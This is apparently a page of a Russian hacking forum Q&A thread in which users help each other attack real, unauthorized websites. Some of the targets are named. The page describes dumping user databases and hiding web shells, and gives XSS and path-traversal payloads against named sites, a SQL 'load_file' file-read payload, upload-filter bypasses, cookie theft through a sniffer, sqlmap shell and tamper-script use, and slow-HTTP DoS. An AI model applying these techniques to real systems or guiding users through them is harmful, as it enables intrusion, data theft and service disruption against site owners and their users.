Вход

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 [3] 4 5 6 7 8 9 10 11 12

BigBear
28.08.2015, 15:20
SaNDER said:
↑ (https://antichat.live/posts/3885217/)
Но там уже каракули,но пароль ввести можно было,но даже с верным паролем зайти не получалось .


Вы видите только HTML форму с вводом пароля, не более.

PHP не интерпретируется, поэтому и не пускает.

zifus
29.08.2015, 11:35
Multiple cross-site request forgery (CSRF) vulnerabilities in the setup process in phpMyAdmin 4.0.x before 4.0.10.10, 4.2.x before 4.2.13.3, 4.3.x before 4.3.13.1, and 4.4.x before 4.4.6.1 allow remote attackers to hijack the authentication of administrators for requests that modify the configuration file.

CVE-2015-3902

Хотел спросить это включительно с 4.0.10.10

-$formset_id = filter_input(INPUT_GET, 'formset');

-$mode = filter_input(INPUT_GET, 'mode');

Некорректно задан набор форм, проверьте массив $formsets в файле setup/frames/form.inc.php

как можно применить даную уязвимость пните меня пожайлуста...

и ище в setup активная загрузка и сохранения может как-то можно применить

SaNDER
29.08.2015, 13:09
zifus said:
↑ (https://antichat.live/posts/3885478/)
Multiple cross-site request forgery (CSRF) vulnerabilities in the setup process in phpMyAdmin 4.0.x before 4.0.10.10, 4.2.x before 4.2.13.3, 4.3.x before 4.3.13.1, and 4.4.x before 4.4.6.1 allow remote attackers to hijack the authentication of administrators for requests that modify the configuration file.
CVE-2015-3902
Хотел спросить это включительно с 4.0.10.10
-$formset_id = filter_input(INPUT_GET, 'formset');
-$mode = filter_input(INPUT_GET, 'mode');
Некорректно задан набор форм, проверьте массив $formsets в файле setup/frames/form.inc.php
как можно применить даную уязвимость пните меня пожайлуста...
и ище в setup активная загрузка и сохранения может как-то можно применить


Да там токо чтение.и установка,вот если б ты мог загружать на сервер файлы,тогда что-то бы ещё и вышло .

Скинь в личку,порыскаем .

SaNDER
29.08.2015, 19:24
Вообщем я не кому нечего не скидывал,но вдруг своими ошарашенными глазами увидел логи чужого чела на своём сниффере .

Вот


Code:
IP адрес : ***.**.***.***; Хост : ***.***.**.***.******.ru; Дата : 02:24:57-29.08.15
Браузер : Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36
Удаленный порт : 30706; Тип соединения : keep-alive
Откуда пришёл : http://*****.ru
Строка запроса : PHPSESSID=типо сессия
jv_enter_ts_TfUQ5fJwAe=1440835166178
jv_visits_count_TfUQ5fJwAe=1
jv_pages_count_TfUQ5fJwAe=13
jv_sess_id_TfUQ5fJwAe=s66c789657b7fc3e21b56b95fc8e 37b94
jv_client_id_TfUQ5fJwAe=2252.OeS99jWigEYkTc3eTutWX W0E2qPYvFoxnk0mVqDh0aA
jv_invitation_time_TfUQ5fJwAe=1440857921737
jv_close_time_TfUQ5fJwAe=1440857926052
jv_gui_state_TfUQ5fJwAe=WIDGET
_ym_visorc_31124201=w[/B]

Реально ли подменить куки,и если да,то как ? .
[/LEFT]

Siqvik
30.08.2015, 05:49
Доброго времени суток. Прошу помощи с этим:

*****.ru/results/?ppage=1

так /?ppage=-1 эрор


Code:
Db failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 1

так /?ppage=999 пусто

так /?ppage=1' вывод без изменений

манипуляции

/?ppage=1*2 выводит /?ppage=1

/?ppage=2-1 выводит /?ppage=2

Можно ли тут что то сделать или нет уязвимости?

rct
30.08.2015, 11:38
Доброго дня. Сайт самописный, скорее всего. Слил базу пользователей, есть пароль админа. Но вот что странно - таблица cs_permission


Code:
id caption
1412 Объявления-Экспорт
1411 Объявления-Настройки
141 Объявления
14 Каталог предприятий
13 Гостевая книга
12 Галерея
9 Настройки новостей
8 Новости
7 Генерировать
5 Иконки в меню
6 Настройки тэгов
4 Картинки
2 Структура
1 Основные свойства
15 Администрирование
11 Источники
10 Тэги
1413 Объявления-Импорт
91 Настройки новостей-выпуски
16 Администрирование сайта
161 Администрирование сайта-Пользователи
92 Настройки новостей-импорт

Захожу под админом, но в упор не наблюдаю ссылки на администрирование. Поддомены только почтовые. Посоветуйте, пожалуйста, в какую сторону еще посмотреть.

kingbeef
30.08.2015, 12:12
Ну если сайт самописный, то это к ванге.

SaNDER
30.08.2015, 12:35
rct said:
↑ (https://antichat.live/posts/3885760/)
Доброго дня. Сайт самописный, скорее всего. Слил базу пользователей, есть пароль админа. Но вот что странно - таблица cs_permission

Code:
id caption
1412 Объявления-Экспорт
1411 Объявления-Настройки
141 Объявления
14 Каталог предприятий
13 Гостевая книга
12 Галерея
9 Настройки новостей
8 Новости
7 Генерировать
5 Иконки в меню
6 Настройки тэгов
4 Картинки
2 Структура
1 Основные свойства
15 Администрирование
11 Источники
10 Тэги
1413 Объявления-Импорт
91 Настройки новостей-выпуски
16 Администрирование сайта
161 Администрирование сайта-Пользователи
92 Настройки новостей-импорт

Захожу под админом, но в упор не наблюдаю ссылки на администрирование. Поддомены только почтовые. Посоветуйте, пожалуйста, в какую сторону
еще посмотреть.


Я конечно в этом не разбираюсь,но вот у меня в админке вот так

http://****.*****.com/admin/edit_app.php? (http://****.*****.com/admin/edit_app.php)appid=1260 .

Если у тебя в админке подобное есть,замени число в id на 15.и может прокатит .

rct
30.08.2015, 12:35
Я понимаю что это как на кофейной гуще гадать, но хоть какую-то зацепку бы.

rct
30.08.2015, 14:47
SaNDER said:
↑ (https://antichat.live/posts/3885776/)
Я конечно в этом не разбираюсь,но вот у меня в админке вот так
http://****.*****.com/admin/edit_app.php? (http://****.*****.com/admin/edit_app.php)
appid=1260 .
Если у тебя в админке подобное есть,замени число в id на 15.и может прокатит .


Суть ясна, но не катит. Например 10 что под админом, что разлогиненым рубрика "Объявления".

SaNDER
30.08.2015, 19:31
Вопрос :вот сайт http://www.zet-obuv.ru и если в него вбить "<>script>alert("WH")

то окошко не появляется,но зато он вбивается под строку "поиск" .

Считается ли это XSS уязвимостью? .

WallHack
30.08.2015, 20:35
SaNDER said:
↑ (https://antichat.live/posts/3885916/)
Вопрос :вот сайт
http://www.zet-obuv.ru
и если в него вбить "<>script>alert("WH")
то окошко не появляется,но зато он вбивается под строку "поиск" .
Считается ли это XSS уязвимостью? .


Пасивная xss ">

SaNDER
30.08.2015, 21:55
[QUOTE="WallHack"]
WallHack said:
↑ (https://antichat.live/posts/3885934/)
Пасивная xss ">

Muracha
31.08.2015, 07:38
rct said:
↑ (https://antichat.live/posts/3885760/)
Доброго дня. Сайт самописный, скорее всего. Слил базу пользователей, есть пароль админа. Но вот что странно - таблица cs_permission

Code:
id caption
1412 Объявления-Экспорт
1411 Объявления-Настройки
141 Объявления
14 Каталог предприятий
13 Гостевая книга
12 Галерея
9 Настройки новостей
8 Новости
7 Генерировать
5 Иконки в меню
6 Настройки тэгов
4 Картинки
2 Структура
1 Основные свойства
15 Администрирование
11 Источники
10 Тэги
1413 Объявления-Импорт
91 Настройки новостей-выпуски
16 Администрирование сайта
161 Администрирование сайта-Пользователи
92 Настройки новостей-импорт

Захожу под админом, но в упор не наблюдаю ссылки на администрирование. Поддомены только почтовые. Посоветуйте, пожалуйста, в какую сторону еще посмотреть.


Я делал следующим образом.

Сливал ВСЮ базу данных и искал ссылки на админку в ней.

Сканировал сканеров директории.

Так же если известны пути, попробуй залить шелл командой "--os-cmd=ls"

Muracha
31.08.2015, 07:45
Уязвимый запрос uname=test&pass=test&op=login' - белая страница. Хочу раскрутить с помощью sqlmap

Как это сделать, то есть как разработать дыру? И правильный ли запрос будет есть поставить так?


Code:
POST /user.php HTTP/1.1
Host: www.site.ru
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:38.0) Gecko/20100101 Firefox/38.0 Iceweasel/38.2.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.site.ru/user.php
Cookie: PHPSESSID=aapqqk2jgl0tvirul3g34cmee5
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

[code]

[code]------Exploit_Code
Content-Disposition: form-data; name="authorize"

1
------Exploit_Code
Content-Disposition: form-data; name="login"

test
------Exploit_Code
Content-Disposition: form-data; name="password"

test
------Exploit_Code--
Content-Disposition: form-data; name="login"

WallHack
31.08.2015, 11:53
SaNDER said:
↑ (https://antichat.live/posts/3885961/)
а к чему твой скрипт,он не пашет на этом сайте,по крайне мере у меня нечего нету,юза мозиллу .


Появляется пустое изображение ! Значит там уязвимость...

Почитай статьи

rct
31.08.2015, 12:46
Muracha said:
↑ (https://antichat.live/posts/3886023/)
попробуй залить шелл командой "--os-cmd=ls"


Нет прав на запись

[WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path)

нужно найти эту админку.

Muracha
31.08.2015, 15:08
rct said:
↑ (https://antichat.live/posts/3886090/)
Нет прав на запись
[WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path)
нужно найти эту админку.


ArxScanSite 3 (http://softxaker.ru/go?a%3AaHR0cDovL2ZpbGVzLmhhY2tlci1sYWIuY29tL2ZpbGV zL3VobVNFZXJxMTM0NTE4NDk1MC5odG1s) тебе в помощь. Или иные сканеры директории

nopony
31.08.2015, 16:31
Siqvik said:
↑ (https://antichat.live/posts/3885724/)
Доброго времени суток. Прошу помощи с этим:
*****.ru/results/?ppage=1
так /?ppage=-1 эрор

Code:
Db failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,10' at line 1

так /?ppage=999 пусто
так /?ppage=1' вывод без изменений
манипуляции
/?ppage=1*2 выводит /?ppage=1
/?ppage=2-1 выводит /?ppage=2
Можно ли тут что то сделать или нет уязвимости?


Увы,но тут intval($_GET[ppage])

rct
31.08.2015, 20:44
Начал сливать всю базу, надеюсь дня за три получится. А пока найдена таблица, в которой хранится php-код. Страничка, на которой выхлоп этого кода тоже найдена. Сначала хотел перезаписать его шелом, но будет слишком палевно. Есть так же подозрение что эта страничка доступна на другом домене как /index.html Можно еще что-то предпринять для заливки шела?

Вообще с этой таблицей по всему выходит что это второй сайт, рядом. И он доступен как по основному домену, так и по мойдомен.com/firma/index.html

Br@!ns
01.09.2015, 11:27
rct said:
↑ (https://antichat.live/posts/3886230/)
Начал сливать всю базу, надеюсь дня за три получится. А пока найдена таблица, в которой хранится php-код. Страничка, на которой выхлоп этого кода тоже найдена. Сначала хотел перезаписать его шелом, но будет слишком палевно. Есть так же подозрение что эта страничка доступна на другом домене как /index.html Можно еще что-то предпринять для заливки шела?
Вообще с этой таблицей по всему выходит что это второй сайт, рядом. И он доступен как по основному домену, так и по мойдомен.com/firma/index.html


А ваша инъекция позволит вам перезаписать этот скрипт? не думаю.

Но если все же условия позволяют, то просто допишите в скрипт минишелл, будет беспалевно визуально, потом уберете.

Ищите админку или показывайте сайт, другие помогут.

SaNDER
01.09.2015, 12:50
Нашёл сайт который позволяет заливать свое звуковое оповещение,я залил .php файл с таким названием shell.mp3.php .

Удивительно,но он его принял .

Токо не не знаю куда он делся.

На этот случай включил Tamper Data во время заливки

http://******.ru/user/upload_sound.php

При открытии страницы браузер Mozilla FireFox выдаёт следущее :


Code:
[/B][/B][/B][/B][/B][/B][/B][/B][/B]
[B][B][B][B][B][B][B][B][B]Неверное перенаправление на странице

Firefox определил, что сервер перенаправляет запрос на этот адрес таким образом, что он никогда не завершится.

Эта проблема может возникать при отключении или запрещении принятия кук.


Можно ли как-то это обойти .

И даже если обойду как в шелл то попасть .

Страница где я заливал шелл выглядел так :


Code:
http://www.*****.ru/index.php?page=6[code]
Вот POST DATA :
[code]-----------------------------2196926319672\r\nContent-Disposition: form-data; name="sound"\r\n\r\n0\r\n-----------------------------2196926319672\r\nContent-Disposition: form-data; name="sound"; filename="shell.mp3.php"\r\nContent-Type: application/octet-stream\r\n\r\n3R½¿¡¹cøNs‚@Éplò)¿¤žfæ"áÒ¸Äuà҈¡F+"»1»¾j0ÙÈ0›T7bì¢Dä


На это [ B ] [ /B ] [ CODE ] [ /CODE ] не обращайте внимание .

Я хз что это,но я это нашёл .


Code:
var PMA_gotoWhitelist = new Array();
PMA_gotoWhitelist[0]="db_create.php";
PMA_gotoWhitelist[1]="db_datadict.php";
PMA_gotoWhitelist[2]="db_sql.php";
PMA_gotoWhitelist[3]="db_events.php";
PMA_gotoWhitelist[4]="db_export.php";
PMA_gotoWhitelist[5]="db_importdocsql.php";
PMA_gotoWhitelist[6]="db_qbe.php";
PMA_gotoWhitelist[7]="db_structure.php";
PMA_gotoWhitelist[8]="db_import.php";
PMA_gotoWhitelist[9]="db_operations.php";
PMA_gotoWhitelist[10]="db_printview.php";
PMA_gotoWhitelist[11]="db_search.php";
PMA_gotoWhitelist[12]="db_routines.php";
PMA_gotoWhitelist[13]="export.php";
PMA_gotoWhitelist[14]="import.php";
PMA_gotoWhitelist[15]="index.php";
PMA_gotoWhitelist[16]="pdf_pages.php";
PMA_gotoWhitelist[17]="pdf_schema.php";
PMA_gotoWhitelist[18]="querywindow.php";
PMA_gotoWhitelist[19]="server_binlog.php";
PMA_gotoWhitelist[20]="server_collations.php";
PMA_gotoWhitelist[21]="server_databases.php";
PMA_gotoWhitelist[22]="server_engines.php";
PMA_gotoWhitelist[23]="server_export.php";
PMA_gotoWhitelist[24]="server_import.php";
PMA_gotoWhitelist[25]="server_privileges.php";
PMA_gotoWhitelist[26]="server_sql.php";
PMA_gotoWhitelist[27]="server_status.php";
PMA_gotoWhitelist[28]="server_status_advisor.php";
PMA_gotoWhitelist[29]="server_status_monitor.php";
PMA_gotoWhitelist[30]="server_status_queries.php";
PMA_gotoWhitelist[31]="server_status_variables.php";
PMA_gotoWhitelist[32]="server_variables.php";
PMA_gotoWhitelist[33]="sql.php";
PMA_gotoWhitelist[34]="tbl_addfield.php";
PMA_gotoWhitelist[35]="tbl_change.php";
PMA_gotoWhitelist[36]="tbl_create.php";
PMA_gotoWhitelist[37]="tbl_import.php";
PMA_gotoWhitelist[38]="tbl_indexes.php";
PMA_gotoWhitelist[39]="tbl_move_copy.php";
PMA_gotoWhitelist[40]="tbl_printview.php";
PMA_gotoWhitelist[41]="tbl_sql.php";
PMA_gotoWhitelist[42]="tbl_export.php";
PMA_gotoWhitelist[43]="tbl_operations.php";
PMA_gotoWhitelist[44]="tbl_structure.php";
PMA_gotoWhitelist[45]="tbl_relation.php";
PMA_gotoWhitelist[46]="tbl_replace.php";
PMA_gotoWhitelist[47]="tbl_row_action.php";
PMA_gotoWhitelist[48]="tbl_select.php";
PMA_gotoWhitelist[49]="tbl_zoom_select.php";
PMA_gotoWhitelist[50]="transformation_overview.php";
PMA_gotoWhitelist[51]="transformation_wrapper.php";
PMA_gotoWhitelist[52]="user_password.php";

rct
01.09.2015, 13:20
Br@!ns said:
↑ (https://antichat.live/posts/3886375/)
А ваша инъекция позволит вам перезаписать этот скрипт? не думаю.
Но если все же условия позволяют, то просто допишите в скрипт минишелл, будет беспалевно визуально, потом уберете.
Ищите админку или показывайте сайт, другие помогут.


Данный скрипт находится в cs2 => cs_user_sites

А вот SCHEMA_PRIVILEGES


Code:
GRANTEE IS_GRANTABLE TABLE_SCHEMA TABLE_CATALOG PRIVILEGE_TYPE
'csuser'@'localhost' NO cs2 NULL SELECT
'csuser'@'localhost' NO cs2 NULL INSERT
'csuser'@'localhost' NO cs2 NULL UPDATE
'csuser'@'localhost' NO cs2 NULL DELETE
'csuser'@'localhost' NO cs2 NULL CREATE
'csuser'@'localhost' NO cs2 NULL DROP
'csuser'@'localhost' NO cs2 NULL INDEX
'csuser'@'localhost' NO cs2 NULL ALTER
'csuser'@'localhost' NO cs2 NULL CREATE TEMPORARY TA…
'csuser'@'localhost' NO cs2 NULL EXECUTE
'csuser'@'localhost' NO cs2 NULL CREATE VIEW
'csuser'@'localhost' NO cs2 NULL SHOW VIEW
'csuser'@'localhost' NO cs2 NULL CREATE ROUTINE
'csuser'@'localhost' NO cs2 NULL ALTER ROUTINE
'csuser'@'localhost' NO cs2 NULL EVENT
'csuser'@'localhost' NO cs2 NULL TRIGGER

По всему выходит что могу. Пока не пробовал, усиленно курю маны по пхп и sql =)

hakwar
01.09.2015, 13:50
Прошу помощи.

Есть доступ к админке и базе данных.Пытаюсь залить шелл через загрузку картинок.Обычная картинка загружается без проблем и через tamper data расширение без проблем меняется на php.

Если в картинку вставить php код то ничего не загружается.Фильтрует где то php код

hakwar
01.09.2015, 17:42
SaNDER said:
↑ (https://antichat.live/posts/3886419/)
Дак если поменял расширение и шелл залился заходи в него и твори чудеса .
Я делал так заливал shell.jpg и потом вмешался с помощью tamper data и поменял расширение на .php .
Можно ещё .htacces юзать если прокатит .


Так в том и дело если картинка то заливается как php а если вставишь код шелла в картинку то не заливается ни как у него в скрипте заливки картинок стоит вот это

if (false != imagecreatefromstring($img) && stripos($img, '

Br@!ns
01.09.2015, 17:55
[QUOTE="hakwar"]
hakwar said:
↑ (https://antichat.live/posts/3886500/)
Так в том и дело если картинка то заливается как php а если вставишь код шелла в картинку то не заливается ни как у него в скрипте заливки картинок стоит вот это
if (false != imagecreatefromstring($img) && stripos($img, '

SaNDER
01.09.2015, 18:04
На сайте могу выполнять команды типа SELECT @@VERSION . Где можно найти подобные команды ?

Или предоставьте сюда список пожалуйста .

hakwar
01.09.2015, 18:12
Да если добавить

BabaDook
01.09.2015, 20:58
Вечер добрый

Почему тут не могу прочитать index

http://pbskids.org/wilsonandditch/games/?game=../index точнее там хрень сказочная

Siqvik
01.09.2015, 23:48
Извиняюсь за тупой вопрос но - может ли сайт (лечь) из за сканера Acunetix? Заметил одну штуку интересную, есть несколько не больших ресурсов на 5-10 страниц, не более. Пускаю скан и о чудо через несколько минут сайт становится недоступным, при чем варианты типа "хостинг кончился" и "сайт отключили" не подходят 100% один из сайтов крутился через Google AdWords а это денег стоит, отключать его не стали бы (знаю хозяев) а при исчерпании средств на хостинге грузится должна соответствующая страница об отключении сайта, а результат который я наблюдал - это просто недоступный сайт "не удалось загрузить страницу" причем при попытке зайти на сайт с другой машины то же самое вижу =) Вот мне оочень интересно - такое вообще возможно?

XAMEHA
02.09.2015, 00:17
[QUOTE="hakwar"]
hakwar said:
↑ (https://antichat.live/posts/3886416/)
Так в том и дело если картинка то заливается как php а если вставишь код шелла в картинку то не заливается ни как у него в скрипте заливки картинок стоит вот это
if (false != imagecreatefromstring($img) && stripos($img, '
...

[/CODE]

BabaDook
02.09.2015, 00:59
Siqvik said:
↑ (https://antichat.live/posts/3886626/)
Извиняюсь за тупой вопрос но - может ли сайт (лечь) из за сканера Acunetix? Заметил одну штуку интересную, есть несколько не больших ресурсов на 5-10 страниц, не более. Пускаю скан и о чудо через несколько минут сайт становится недоступным, при чем варианты типа "хостинг кончился" и "сайт отключили" не подходят 100% один из сайтов крутился через Google AdWords а это денег стоит, отключать его не стали бы (знаю хозяев) а при исчерпании средств на хостинге грузится должна соответствующая страница об отключении сайта, а результат который я наблюдал - это просто недоступный сайт "не удалось загрузить страницу" причем при попытке зайти на сайт с другой машины то же самое вижу =) Вот мне оочень интересно - такое вообще возможно?


да , может

Siqvik
02.09.2015, 01:07
BabaDook said:
↑ (https://antichat.live/posts/3886642/)
да , может


Интересно с чем это связано? Со скоростью запросов к серверу или просто в методах проверки, я так понимаю он "методом тыка" проверяет?

И еще интересует атака под названием "Slow HTTP DOS". Акунетикс показывает наличие такой уязвимости, хотелось бы инфы хоть какой то, поиск ничего толкового не дал, а на забугорных ресурсах как то совсем заумно, общие черты понял а вот как это дело осуществить так и не понял, есть ли софт какой под окна? Направьте на путь истинный =)) с инфой пожалста =)

BabaDook
02.09.2015, 01:34
Siqvik said:
↑ (https://antichat.live/posts/3886645/)
Интересно с чем это связано? Со скоростью запросов к серверу или просто в методах проверки, я так понимаю он "методом тыка" проверяет?


это своего рода Дос атака . Связана с тем что паук крауль, то что делает карту сети, ходит по сайту, запрашивает страницу. идёт нагрузка на слабенткий хост

ubepkr
02.09.2015, 12:07
Доброго времени суток! Есть цель, которая не дает спокойно уснуть)). Поэтому куча вопросов (извиняйте, если сумбурно):

1. Удалось вытащить phpinfo.php, согласно которому установлено: операционка - LinuxRedhat, сервер - Apache/2.2.3 (CentOS), PHP Version 5.3.6, phpMyAdmin 2.11.11.3, mysql 5.1.58.

Собственно вопрос, что означает последний адрес: HTTP_X_FORWARDED_FOR- 95.141.31.xxx, HTTP_X_REAL_IP - 95.141.31.xxx, REMOTE_ADDR - 95.141.31.xxx, SERVER_ADDR - 62.76.47.XXX? Виртуалка?

2. H**p://цель/myadmin/scripts/setup.php запускается, но не активны save/load. H**p://цель/myadmin/config.inc.php - пустой. H**p://цель/myadmin/libraries/config.default.php - пустой.

Означает ли это, что ../config/ не создан и эта админка вообще не используется? Но ведь h**p://цель/myadmin/index.php- таки запрашивает авторизацию, как и H**p://цель/myadmin/scripts/signon.php...

3. Может ли быть такое, что админки вообще нет (не сконфигурирована), а сайт заливается по ftp? Или искать другую админку (пока методом тыка нашел закрытые папки h**p://цель/code/, h**p://цель/cgi-bin/, с авторизацией h**p://цель/ webmail/src/login.php/, открытую h**p://цель/icons/).

4. В корне находятся (forbidden) /.htaccess, /.htpasswd, /.htconfig - может, вся соль там?)) Куды копать дальше?

Заранее спасибо!

XAMEHA
02.09.2015, 12:20
BabaDook said:
↑ (https://antichat.live/posts/3886568/)
Вечер добрый
Почему тут не могу прочитать index
http://pbskids.org/wilsonandditch/games/?game=../index
точнее там хрень сказочная


game=../index.php%00

Дописываемое расширение - не php.

BabaDook
02.09.2015, 12:55
XAMEHA said:
↑ (https://antichat.live/posts/3886743/)
game=../index.php%00
Дописываемое расширение - не php.


Ух ты, спасибо. что-то я об этом не подумал

Muracha
02.09.2015, 20:29
ubepkr said:
↑ (https://antichat.live/posts/3886739/)
Доброго времени суток! Есть цель, которая не дает спокойно уснуть)). Поэтому куча вопросов (извиняйте, если сумбурно):
1. Удалось вытащить phpinfo.php, согласно которому установлено: операционка - LinuxRedhat, сервер - Apache/2.2.3 (CentOS), PHP Version 5.3.6, phpMyAdmin 2.11.11.3, mysql 5.1.58.
Собственно вопрос, что означает последний адрес: HTTP_X_FORWARDED_FOR- 95.141.31.xxx, HTTP_X_REAL_IP - 95.141.31.xxx, REMOTE_ADDR - 95.141.31.xxx, SERVER_ADDR - 62.76.47.XXX? Виртуалка?
2. H**p://цель/myadmin/scripts/setup.php запускается, но не активны save/load. H**p://цель/myadmin/config.inc.php - пустой. H**p://цель/myadmin/libraries/config.default.php - пустой.
Означает ли это, что ../config/ не создан и эта админка вообще не используется? Но ведь h**p://цель/myadmin/index.php- таки запрашивает авторизацию, как и H**p://цель/myadmin/scripts/signon.php...
3. Может ли быть такое, что админки вообще нет (не сконфигурирована), а сайт заливается по ftp? Или искать другую админку (пока методом тыка нашел закрытые папки h**p://цель/code/, h**p://цель/cgi-bin/, с авторизацией h**p://цель/ webmail/src/login.php/, открытую h**p://цель/icons/).
4. В корне находятся (forbidden) /.htaccess, /.htpasswd, /.htconfig - может, вся соль там?)) Куды копать дальше?
Заранее спасибо!


через phpmyadmin 2.11 версии шелл не залить. Если там стоит что-то типа "

Can not load or save configuration

Please create web server writable folder config in phpMyAdmin toplevel directory as described in documentation (http://nevzorov.tv/phpmyadmin/Documentation.html#setup_script). Otherwise you will be only able to download or display it"

То значит майадмин ставили не через браузер и прав нет на создание и запись файлов.

Ищи другие методы.

ubepkr
02.09.2015, 21:03
Muracha said:
↑ (https://antichat.live/posts/3886925/)
через phpmyadmin 2.11 версии шелл не залить. Если там стоит что-то типа "
Can not load or save configuration
Please create web server writable folder config in phpMyAdmin toplevel directory as described in
documentation (http://nevzorov.tv/phpmyadmin/Documentation.html#setup_script)
. Otherwise you will be only able to download or display it"
То значит майадмин ставили не через браузер и прав нет на создание и запись файлов.
Ищи другие методы.


Спасибо, именно такая загогулина и присутствует, к сожалению. А другой админки не может быть (а эта-типа заманухи)?

И другие вопросы тоже актуальны))

frank
03.09.2015, 00:26
ubepkr said:
↑ (https://antichat.live/posts/3886739/)
Доброго времени суток! Есть цель, которая не дает спокойно уснуть)). Поэтому куча вопросов (извиняйте, если сумбурно):
1. Удалось вытащить phpinfo.php, согласно которому установлено: операционка - LinuxRedhat, сервер - Apache/2.2.3 (CentOS), PHP Version 5.3.6, phpMyAdmin 2.11.11.3, mysql 5.1.58.
Собственно вопрос, что означает последний адрес: HTTP_X_FORWARDED_FOR- 95.141.31.xxx, HTTP_X_REAL_IP - 95.141.31.xxx, REMOTE_ADDR - 95.141.31.xxx, SERVER_ADDR - 62.76.47.XXX? Виртуалка?
2. H**p://цель/myadmin/scripts/setup.php запускается, но не активны save/load. H**p://цель/myadmin/config.inc.php - пустой. H**p://цель/myadmin/libraries/config.default.php - пустой.
Означает ли это, что ../config/ не создан и эта админка вообще не используется? Но ведь h**p://цель/myadmin/index.php- таки запрашивает авторизацию, как и H**p://цель/myadmin/scripts/signon.php...
3. Может ли быть такое, что админки вообще нет (не сконфигурирована), а сайт заливается по ftp? Или искать другую админку (пока методом тыка нашел закрытые папки h**p://цель/code/, h**p://цель/cgi-bin/, с авторизацией h**p://цель/ webmail/src/login.php/, открытую h**p://цель/icons/).
4. В корне находятся (forbidden) /.htaccess, /.htpasswd, /.htconfig - может, вся соль там?)) Куды копать дальше?
Заранее спасибо!


По первому пункту

http://php.net/manual/en/reserved.variables.server.php

Muracha
03.09.2015, 08:51
1. Удалось вытащить phpinfo.php, согласно которому установлено: операционка - LinuxRedhat, сервер - Apache/2.2.3 (CentOS), PHP Version 5.3.6, phpMyAdmin 2.11.11.3, mysql 5.1.58.
Собственно вопрос, что означает последний адрес: HTTP_X_FORWARDED_FOR- 95.141.31.xxx, HTTP_X_REAL_IP - 95.141.31.xxx, REMOTE_ADDR - 95.141.31.xxx, SERVER_ADDR - 62.76.47.XXX? Виртуалка?


Это твои ip, а сервер addr - адрес сервера.


Может ли быть такое, что админки вообще нет (не сконфигурирована), а сайт заливается по ftp? Или искать другую админку (пока методом тыка нашел закрытые папки h**p://цель/code/, h**p://цель/cgi-bin/, с авторизацией h**p://цель/ webmail/src/login.php/, открытую h**p://цель/icons/).


может быть как угодно. может быть админка со скулей, может админка со стандартным паролем админ и пр.

Нужно сканировать, чтобы найти ее. сканером директории.


4. В корне находятся (forbidden) /.htaccess, /.htpasswd, /.htconfig - может, вся соль там?)) Куды копать дальше?


линки, пароль и конфиг. Ничего интересного. Максимум, найдешь пару директории и хешированный пароль в DES(если есть права на запись.)

------------------------

Теперь у меня самого вопрос.

Каким образом можно прочитать чужие файлы на сервере? Через mysql я уже попытался...

BabaDook
03.09.2015, 11:22
Muracha said:
↑ (https://antichat.live/posts/3887034/)
Это твои ip, а сервер addr - адрес сервера.
может быть как угодно. может быть админка со скулей, может админка со стандартным паролем админ и пр.
Нужно сканировать, чтобы найти ее. сканером директории.
линки, пароль и конфиг. Ничего интересного. Максимум, найдешь пару директории и хешированный пароль в DES(если есть права на запись.)
------------------------
Теперь у меня самого вопрос.
Каким образом можно прочитать чужие файлы на сервере? Через mysql я уже попытался...


union select 1,2,3,4,5,load_file('путьк чужёму вайлу на сервере'),6,7,8,9,0 -- Но я думаю тебя просто туда не пустят, не каждый свой файл можешь прочитать.

Muracha
03.09.2015, 12:27
BabaDook said:
↑ (https://antichat.live/posts/3887057/)
union select 1,2,3,4,5,load_file('путьк чужёму вайлу на сервере'),6,7,8,9,0 -- Но я думаю тебя просто туда не пустят, не каждый свой файл можешь прочитать.


у меня есть шелл. есть доступ к записям файлов, есть доступ к БД phpmyadmin пользователя. дело даже не в sql ini..

Использовал статью https://xakep.ru/2013/11/16/read-file-in-mysql/ но как-то грустно.

То есть не сработало.

hakwar
04.09.2015, 12:22
XAMEHA said:
↑ (https://antichat.live/posts/3886635/)

Code:

...




Не пропускает....

DezMond™
04.09.2015, 13:47
Как в sqlmap заменить union на /*!12345uNIoN*/

--prefix=PREFIX Injection payload prefix string

--suffix=SUFFIX Injection payload suffix string

--tamper=TAMPER Use given script(s) for tampering injection data

Как заюзать?

YaBtr
04.09.2015, 15:18
DezMond™ said:
↑ (https://antichat.live/posts/3887422/)
Как в sqlmap заменить union на /*!12345uNIoN*/
--prefix=PREFIX Injection payload prefix string
--suffix=SUFFIX Injection payload suffix string
--tamper=TAMPER Use given script(s) for tampering injection data
Как заюзать?


Тампер-скрипты посмотрите, должен быть такой в папке /tamper.

BabaDook
05.09.2015, 00:45
YaBtr said:
↑ (https://antichat.live/posts/3887449/)
Тампер-скрипты посмотрите, должен быть такой в папке /tamper.


Я так понимаю скрипт называется unionalltounion


PHP:
#!/usr/bin/env python

"""
Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""

from lib.core.enums import PRIORITY

__priority__=PRIORITY.HIGHEST

def dependencies():
pass

def tamper(payload, **kwargs):
"""
Replaces /*!12345uNioN*/ /*!12345AlL*/ /*!12345seLEcT*/ with /*!12345uNioN*/ /*!12345seLEcT*/

>>> tamper('-1 /*!12345uNioN*/ /*!12345AlL*/ /*!12345seLEcT*/')
'-1 /*!12345uNioN*/ /*!12345seLEcT*/'
"""

returnpayload.replace("UNION ALL SELECT","/*!12345uNioN*/ /*!12345seLEcT*/") ifpayloadelsepayload

gQd
11.09.2015, 10:46
http://gmsy.ru/games/1'

Как можно раскрутить?

faza02
11.09.2015, 10:51
gQd said:
↑ (https://antichat.live/posts/3890036/)
http://gmsy.ru/games/1
'
Как можно раскрутить?


попробуйте вектор без пробелов

Br@!ns
11.09.2015, 12:06
gQd said:
↑ (https://antichat.live/posts/3890036/)
http://gmsy.ru/games/1
'
Как можно раскрутить?


